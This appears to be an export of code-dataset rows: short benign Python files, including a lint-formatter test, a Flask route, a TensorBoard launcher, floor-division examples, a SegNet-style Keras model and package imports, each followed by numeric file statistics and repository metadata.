        formatter.format_lint_title(parser_name, None)
def test_format_lint_title_with_no_parser_name(valid_lint_lines, valid_lint_format):
    """Empty parser name falls back to the no-name banner."""
    produced = formatter.format_lint_title("", [])
    assert produced == [
        valid_lint_format.get("header_divider"),
        valid_lint_format.get("no_parser_name_formatted"),
        valid_lint_format.get("header_divider"),
    ]
| 53.713178
| 101
| 0.732285
| 995
| 6,929
| 4.60804
| 0.047236
| 0.227699
| 0.196292
| 0.184515
| 0.985605
| 0.98386
| 0.975354
| 0.966848
| 0.960742
| 0.942203
| 0
| 0.011157
| 0.159186
| 6,929
| 128
| 102
| 54.132813
| 0.775832
| 0
| 0
| 0.683168
| 0
| 0
| 0.144754
| 0.025112
| 0
| 0
| 0
| 0
| 0.613861
| 1
| 0.128713
| false
| 0
| 0.019802
| 0
| 0.148515
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8ed0e97d949c43ee6f4bff63987515e5d1609de1
| 189
|
py
|
Python
|
app/routes.py
|
hallowf/GameSaveBackups-flask-static
|
5ceaaf61eaa67f27d03864d9710f34b7384bf7c1
|
[
"CNRI-Python"
] | null | null | null |
app/routes.py
|
hallowf/GameSaveBackups-flask-static
|
5ceaaf61eaa67f27d03864d9710f34b7384bf7c1
|
[
"CNRI-Python"
] | null | null | null |
app/routes.py
|
hallowf/GameSaveBackups-flask-static
|
5ceaaf61eaa67f27d03864d9710f34b7384bf7c1
|
[
"CNRI-Python"
] | null | null | null |
from flask import Flask, render_template, Response, send_file, request, jsonify
from app import app
### Page routes
@app.route("/")
def index():
    """Serve the site landing page."""
    template = "index.html"
    return render_template(template)
| 18.9
| 79
| 0.730159
| 26
| 189
| 5.192308
| 0.692308
| 0.207407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 189
| 9
| 80
| 21
| 0.838509
| 0.058201
| 0
| 0
| 0
| 0
| 0.063218
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8ede233dcd188e68bcd1525cbf27f0621d92b178
| 293
|
py
|
Python
|
raisimGymTorch/raisimGymTorch/env/envs/rsg_ouzel_delta/scripts/tensorboard_launch.py
|
vschorp/raisimLib
|
387784292d9acf97a202e9ec6bad0434b0ff3f39
|
[
"Apache-2.0"
] | null | null | null |
raisimGymTorch/raisimGymTorch/env/envs/rsg_ouzel_delta/scripts/tensorboard_launch.py
|
vschorp/raisimLib
|
387784292d9acf97a202e9ec6bad0434b0ff3f39
|
[
"Apache-2.0"
] | null | null | null |
raisimGymTorch/raisimGymTorch/env/envs/rsg_ouzel_delta/scripts/tensorboard_launch.py
|
vschorp/raisimLib
|
387784292d9acf97a202e9ec6bad0434b0ff3f39
|
[
"Apache-2.0"
] | null | null | null |
import os
from raisimGymTorch.helper.raisim_gym_helper import ConfigurationSaver, tensorboard_launcher
# Directory of event files to visualize. Previously hard-coded to one user's
# checkout; allow overriding via the TENSORBOARD_LOGDIR environment variable,
# falling back to the original path so existing behavior is unchanged.
_DEFAULT_LOG_DIR = (
    "/home/vincent/rl_4_aerial_manipulator/catkin_ws/src/raisimLib/"
    "raisimGymTorch/data/ouzel_delta_planning"
)
tensorboard_launcher(os.environ.get("TENSORBOARD_LOGDIR", _DEFAULT_LOG_DIR))
| 41.857143
| 126
| 0.877133
| 36
| 293
| 6.777778
| 0.666667
| 0.233607
| 0.188525
| 0.245902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003559
| 0.040956
| 293
| 6
| 127
| 48.833333
| 0.864769
| 0.197952
| 0
| 0
| 0
| 0
| 0.437768
| 0.437768
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d9236bd6bf0c3d0e232db0699d80ef9669dca405
| 62
|
py
|
Python
|
Cisco/2.1.3.4.py
|
martageraldo/aula-python-cisco
|
6f4061c4200bb611f90a4231e1646ae8a0066e99
|
[
"MIT"
] | null | null | null |
Cisco/2.1.3.4.py
|
martageraldo/aula-python-cisco
|
6f4061c4200bb611f90a4231e1646ae8a0066e99
|
[
"MIT"
] | null | null | null |
Cisco/2.1.3.4.py
|
martageraldo/aula-python-cisco
|
6f4061c4200bb611f90a4231e1646ae8a0066e99
|
[
"MIT"
] | null | null | null |
# Floor division (//): the result is an int only when both operands are ints;
# a float on either side makes the result a float.
for numerator, denominator in ((6, 3), (6, 3.), (6., 3), (6., 3.)):
    print(numerator // denominator)
| 15.5
| 15
| 0.451613
| 12
| 62
| 2.333333
| 0.25
| 0.857143
| 1
| 1.285714
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.166667
| 0.225806
| 62
| 4
| 16
| 15.5
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
79992efeb846fa5a9fa514cb1ac31b8eb994a72a
| 2,912
|
py
|
Python
|
Chapter05/1_segnet.py
|
yasin-gh/Deep-Learning-for-Computer-Vision
|
d5b3e153369018029270a6a47349ee8ce7c7641e
|
[
"MIT"
] | 200
|
2018-01-23T16:00:19.000Z
|
2022-03-26T09:28:48.000Z
|
Chapter05/1_segnet.py
|
yasin-gh/Deep-Learning-for-Computer-Vision
|
d5b3e153369018029270a6a47349ee8ce7c7641e
|
[
"MIT"
] | 11
|
2018-06-13T07:50:40.000Z
|
2020-10-13T05:28:12.000Z
|
Chapter05/1_segnet.py
|
yasin-gh/Deep-Learning-for-Computer-Vision
|
d5b3e153369018029270a6a47349ee8ce7c7641e
|
[
"MIT"
] | 163
|
2018-01-24T02:38:52.000Z
|
2022-01-13T20:23:17.000Z
|
import tensorflow as tf
# SegNet-style encoder/decoder for per-pixel semantic segmentation.
input_height = 360
input_width = 480
kernel = 3
filter_size = 64
pad = 1
pool_size = 2

# Fix: `nClasses` was referenced below but never defined (NameError at
# runtime). 12 matches the CamVid label set commonly used with SegNet —
# adjust to the dataset actually in use.
nClasses = 12

model = tf.keras.models.Sequential()
# Fix: a bare `tf.keras.layers.Layer(input_shape=...)` does not declare a
# model input in tf.keras; InputLayer does.
model.add(tf.keras.layers.InputLayer(input_shape=(3, input_height, input_width)))
# NOTE(review): (3, H, W) is a channels-first shape, but Conv2D/MaxPooling2D
# default to channels_last — confirm the intended data_format.


def _pad_conv_bn(filters):
    """Append the ZeroPad + Conv + BatchNorm trio shared by every stage.

    Fix: `border_mode='valid'` and the two positional kernel ints are
    Keras-1 API; tf.keras takes a kernel tuple and `padding=`.
    """
    model.add(tf.keras.layers.ZeroPadding2D(padding=(pad, pad)))
    model.add(tf.keras.layers.Conv2D(filters, (kernel, kernel), padding='valid'))
    model.add(tf.keras.layers.BatchNormalization())


# encoder: four stages; the last (512) stage has no pooling.
for filters, pool in ((filter_size, True), (128, True), (256, True), (512, False)):
    _pad_conv_bn(filters)
    model.add(tf.keras.layers.Activation('relu'))
    if pool:
        model.add(tf.keras.layers.MaxPooling2D(pool_size=(pool_size, pool_size)))

# decoder: mirror of the encoder; the last stage has no upsampling.
for filters, upsample in ((512, True), (256, True), (128, True), (filter_size, False)):
    _pad_conv_bn(filters)
    if upsample:
        model.add(tf.keras.layers.UpSampling2D(size=(pool_size, pool_size)))

# 1x1 convolution producing per-pixel class scores.
model.add(tf.keras.layers.Conv2D(nClasses, (1, 1), padding='valid'))

model.outputHeight = model.output_shape[-2]
model.outputWidth = model.output_shape[-1]

# Flatten the spatial dimensions so softmax runs over classes per pixel.
model.add(tf.keras.layers.Reshape(
    (nClasses, model.output_shape[-2] * model.output_shape[-1]),
    input_shape=(nClasses, model.output_shape[-2], model.output_shape[-1])))
model.add(tf.keras.layers.Permute((2, 1)))
model.add(tf.keras.layers.Activation('softmax'))

# Fix: the optimizer was passed as the Adam class object; Keras expects an
# instance (or a registered string name).
model.compile(loss="categorical_crossentropy",
              optimizer=tf.keras.optimizers.Adam(),
              metrics=['accuracy'])
| 42.202899
| 104
| 0.769574
| 432
| 2,912
| 5.092593
| 0.134259
| 0.130455
| 0.177273
| 0.265909
| 0.851364
| 0.831818
| 0.814545
| 0.814545
| 0.814545
| 0.749545
| 0
| 0.022901
| 0.055288
| 2,912
| 68
| 105
| 42.823529
| 0.776808
| 0.005151
| 0
| 0.666667
| 0
| 0
| 0.034554
| 0.008293
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019608
| 0
| 0.019608
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79bfc319f03fd5f71b0bb59d154dc89366bf7aa2
| 99
|
py
|
Python
|
rl/episode/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | 3
|
2018-01-16T19:26:17.000Z
|
2018-02-06T19:38:04.000Z
|
rl/episode/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | null | null | null |
rl/episode/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | null | null | null |
from rl.episode.episode import Episode
from rl.episode.episode_serializer import EpisodeSerializer
| 33
| 59
| 0.878788
| 13
| 99
| 6.615385
| 0.461538
| 0.139535
| 0.302326
| 0.465116
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080808
| 99
| 2
| 60
| 49.5
| 0.945055
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.